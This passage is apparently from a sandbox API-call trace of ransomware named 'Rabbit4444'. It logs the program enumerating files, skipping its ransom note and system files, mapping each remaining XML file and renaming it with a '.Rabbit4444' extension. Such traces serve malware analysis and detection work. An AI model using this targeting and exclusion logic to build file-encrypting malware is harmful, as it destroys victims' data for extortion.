ftCreationTime.dwLowDateTime=0xf353b96a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf353b96a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf353b96a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.473] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.473] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.473] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa875be89, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xa875be89, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x840fae4f, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x41c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", cAlternateFileName="03D1E1~1.XML")) returned 1 [0070.473] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.473] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.473] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="Rabbit4444.exe") returned -1 [0070.473] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2=".") returned 1 [0070.473] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="..") returned 1 [0070.473] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="windows") returned -1 [0070.473] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="bootmgr") returned -1 [0070.473] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="pagefile.sys") returned -1 [0070.473] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="boot") returned -1 [0070.473] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="ids.txt") returned -1 [0070.473] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="NTUSER.DAT") returned -1 [0070.473] lstrcpyW (in: lpString1=0x130ec14, lpString2="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml" | out: lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml") returned="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml" [0070.473] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", dwFileAttributes=0x0) returned 1 [0070.474] lstrlenW (lpString="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml") returned 45 [0070.474] lstrlenW (lpString="Rabbit4444") returned 10 [0070.474] lstrcmpiW (lpString1="4_show.xml", lpString2="Rabbit4444") returned -1 [0070.474] lstrlenW (lpString=".dll") returned 4 [0070.474] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.474] lstrlenW (lpString=".lnk") returned 4 [0070.474] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.474] lstrlenW (lpString=".ini") returned 4 [0070.474] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.474] lstrlenW (lpString=".sys") returned 4 [0070.474] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.474] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.475] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.475] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16178543630) returned 1 [0070.475] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16834) returned 1 [0070.475] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0070.475] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0070.475] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x44d0, lpName=0x0) returned 0x2d0 [0070.476] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x44d0) returned 0x70000 [0070.478] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.478] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0070.478] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.478] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0070.478] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.478] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0070.478] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.478] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0070.478] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16178898141) returned 1 [0070.478] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0070.478] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0070.479] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.479] CloseHandle (hObject=0x2d0) returned 1 [0070.479] CloseHandle (hObject=0x29c) returned 1 [0070.479] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml.Rabbit4444") returned 166 [0070.479] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.480] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa88d9622, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xa88d9622, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x840fae4f, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x441b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", cAlternateFileName="03D1E1~2.XML")) returned 1 [0070.480] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.480] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.480] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="Rabbit4444.exe") returned -1 [0070.480] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2=".") returned 1 [0070.480] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="..") returned 1 [0070.480] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="windows") returned -1 [0070.480] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="bootmgr") returned -1 [0070.480] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="pagefile.sys") returned -1 [0070.480] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="boot") returned -1 [0070.480] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="ids.txt") returned -1 [0070.480] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="NTUSER.DAT") returned -1 [0070.480] lstrcpyW (in: lpString1=0x130ec14, lpString2="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml" | out: lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml") returned="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml" [0070.480] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", dwFileAttributes=0x0) returned 1 [0070.480] lstrlenW (lpString="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml") returned 49 [0070.480] lstrlenW (lpString="Rabbit4444") returned 10 [0070.480] lstrcmpiW (lpString1="thdraw.xml", lpString2="Rabbit4444") returned 1 [0070.480] lstrlenW (lpString=".dll") returned 4 [0070.480] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.480] lstrlenW (lpString=".lnk") returned 4 [0070.480] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.480] lstrlenW (lpString=".ini") returned 4 [0070.480] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.481] lstrlenW (lpString=".sys") returned 4 [0070.481] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.481] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.481] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.481] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16179172216) returned 1 [0070.481] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17435) returned 1 [0070.481] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0070.481] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0070.481] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4720, lpName=0x0) returned 0x2d0 [0070.482] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4720) returned 0x70000 [0070.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0070.483] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0070.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0070.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0070.484] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16179448062) returned 1 [0070.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0070.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0070.484] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.484] CloseHandle (hObject=0x2d0) returned 1 [0070.484] CloseHandle (hObject=0x29c) returned 1 [0070.484] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml.Rabbit4444") returned 170 [0070.484] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.485] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc72d7f79, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc72d7f79, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb8128f6c, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", cAlternateFileName="394B7B~1.XML")) returned 1 [0070.485] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.485] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.485] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="Rabbit4444.exe") returned -1 [0070.485] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2=".") returned 1 [0070.485] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="..") returned 1 [0070.485] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="windows") returned -1 [0070.485] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="bootmgr") returned -1 [0070.485] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="pagefile.sys") returned -1 [0070.485] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="boot") returned -1 [0070.485] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="ids.txt") returned -1 [0070.485] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="NTUSER.DAT") returned -1 [0070.485] lstrcpyW (in: lpString1=0x130ec14, lpString2="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml" | out: lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml") returned="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml" [0070.485] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", dwFileAttributes=0x0) returned 1 [0070.487] lstrlenW (lpString="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml") returned 45 [0070.487] lstrlenW (lpString="Rabbit4444") returned 10 [0070.487] lstrcmpiW (lpString1="5_show.xml", lpString2="Rabbit4444") returned -1 [0070.487] lstrlenW (lpString=".dll") returned 4 [0070.487] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.487] lstrlenW (lpString=".lnk") returned 4 [0070.487] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.487] lstrlenW (lpString=".ini") returned 4 [0070.487] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.487] lstrlenW (lpString=".sys") returned 4 [0070.487] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.487] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.487] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.487] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16179812892) returned 1 [0070.487] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16768) returned 1 [0070.487] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0070.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0070.488] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4480, lpName=0x0) returned 0x2d0 [0070.489] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4480) returned 0x70000 [0070.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0070.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0070.490] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0070.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0070.490] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16180112186) returned 1 [0070.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0070.490] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0070.490] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.491] CloseHandle (hObject=0x2d0) returned 1 [0070.491] CloseHandle (hObject=0x29c) returned 1 [0070.491] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml.Rabbit4444") returned 166 [0070.491] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.492] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc73243e8, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc73243e8, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb5c02e23, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4187, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", cAlternateFileName="394B7B~2.XML")) returned 1 [0070.492] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.492] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.492] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="Rabbit4444.exe") returned -1 [0070.492] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2=".") returned 1 [0070.492] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="..") returned 1 [0070.492] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="windows") returned -1 [0070.492] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="bootmgr") returned -1 [0070.492] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="pagefile.sys") returned -1 [0070.492] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="boot") returned -1 [0070.492] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="ids.txt") returned -1 [0070.492] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="NTUSER.DAT") returned -1 [0070.492] lstrcpyW (in: lpString1=0x130ec14, lpString2="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml" | out: lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml") returned="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml" [0070.492] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", dwFileAttributes=0x0) returned 1 [0070.492] lstrlenW (lpString="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml") returned 49 [0070.492] lstrlenW (lpString="Rabbit4444") returned 10 [0070.492] lstrcmpiW (lpString1="thdraw.xml", lpString2="Rabbit4444") returned 1 [0070.492] lstrlenW (lpString=".dll") returned 4 [0070.492] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.492] lstrlenW (lpString=".lnk") returned 4 [0070.492] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.493] lstrlenW (lpString=".ini") returned 4 [0070.493] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.493] lstrlenW (lpString=".sys") returned 4 [0070.493] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.493] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.493] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.493] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16180375770) returned 1 [0070.493] GetFileSizeEx (in: hFile=0x29c, 